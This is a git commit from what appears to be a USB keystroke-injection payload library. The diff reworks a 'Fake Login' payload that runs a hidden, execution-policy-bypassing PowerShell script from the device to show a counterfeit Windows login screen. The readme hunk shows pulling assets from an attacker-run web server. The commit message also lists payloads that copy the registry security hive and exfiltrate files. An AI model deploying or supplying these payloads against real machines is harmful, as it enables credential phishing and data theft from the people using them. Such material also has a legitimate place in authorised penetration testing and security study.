New Payload: Win_PoSH_WordReport, Fix typos in Win_PoSH_FakeLoginScreen (#431)

* Add files via upload * Update readme.md * Update payload.txt * Update readme.md * Update readme.md * Update readme.md * Update readme.md * Update readme.md * Add files via upload * Update readme.md * Update readme.md * Add Payload WIN_PoSH_HKU_RegBackUp * Update readme.md * Update payload.txt * Change for admin shell * Update readme.md * Update payload.txt * Update payload.txt * Update readme.md * Added payload WIN_PoSH_SaveSecurityHive Added new payload to exfiltration that saves the HKLM security hive to the bunny * Morse Code File Exfiltration A bit pointless with limitation of morse code but I thought it was fun to create. * Update readme.md * Update for non-alphanumeric * Update for timing * Update readme.md * Update readme.md * Update readme.md * Update readme.md * Update payload.txt * New payload - Fake Login Shows a fake version of the windows 10 login screen * Update readme.md * Changes to Fake Login Payload * Changes to Fake Login * Win_PoSH_FakeLogin: Changes to payload and readme * New recon payload: Win_PoSH_WordReport * Update fixed typo: Win_PoSH_WordReport
2025-10-29 16:58:25 +00:00 · 2021-04-30 17:02:21 +01:00
parent 7a0d036b74
commit 8cd8d859cd
5 changed files with 387 additions and 21 deletions
--- a/payloads/library/credentials/Win_PoSH_FakeLogin/payload.txt
+++ b/payloads/library/credentials/Win_PoSH_FakeLogin/payload.txt
@@ -1,20 +1,22 @@
-# Title:        Fake Login
-# Description:  Shows a fake login screen
-# Author:       Cribbit
-# Version:      1.0
-# Category:     Credentials
-# Target:       Windows (Powershell 5.1+)
-# Attackmodes:	HID & STORAGE 
-# Extensions:   Run
-
-LED SETUP
-
-GET SWITCH_POSITION
-
-ATTACKMODE HID STORAGE VID_0X05AC PID_0X021E
-
-LED ATTACK
-
-RUN WIN "powerShell -Noni -NoP -W h -EP Bypass .((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\L.ps1')"
-
-LED FINISH
+# Title:       Fake Login
+# Description: Shows a fake login screen
+# Author:      Cribbit
+# Version:     1.0
+# Category:    Credentials
+# Target:      Windows (Powershell 5.1+)
+# Attackmodes: HID & STORAGE 
+# Extensions:  Run
+
+LED SETUP
+
+GET SWITCH_POSITION
+
+ATTACKMODE HID STORAGE
+
+QUACK DELAY 500
+
+LED ATTACK
+
+RUN WIN "powershell -Noni -NoP -W h -EP Bypass .((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\L.ps1')"
+
+LED FINISH
--- a/payloads/library/credentials/Win_PoSH_FakeLogin/readme.md
+++ b/payloads/library/credentials/Win_PoSH_FakeLogin/readme.md
@@ -21,7 +21,7 @@ If you do not wish to use them you could have the files on the bunny and do some
 ```powershell
 $BGImg = [System.Drawing.Image]::FromFile(<PathToBunny>"bg.jpg");
 ```
-or if you have web hosting or a http server runing on the bunny then you can do something like:
+or if you have web hosting or a http server running on the bunny then you can do something like:
 ```powershell
 $R = Invoke-WebRequest 'https://<MyURL/IPAddress>/bg.jpg'; 
 $BGImg = [System.Drawing.Image]::FromStream($R.RawContentStream);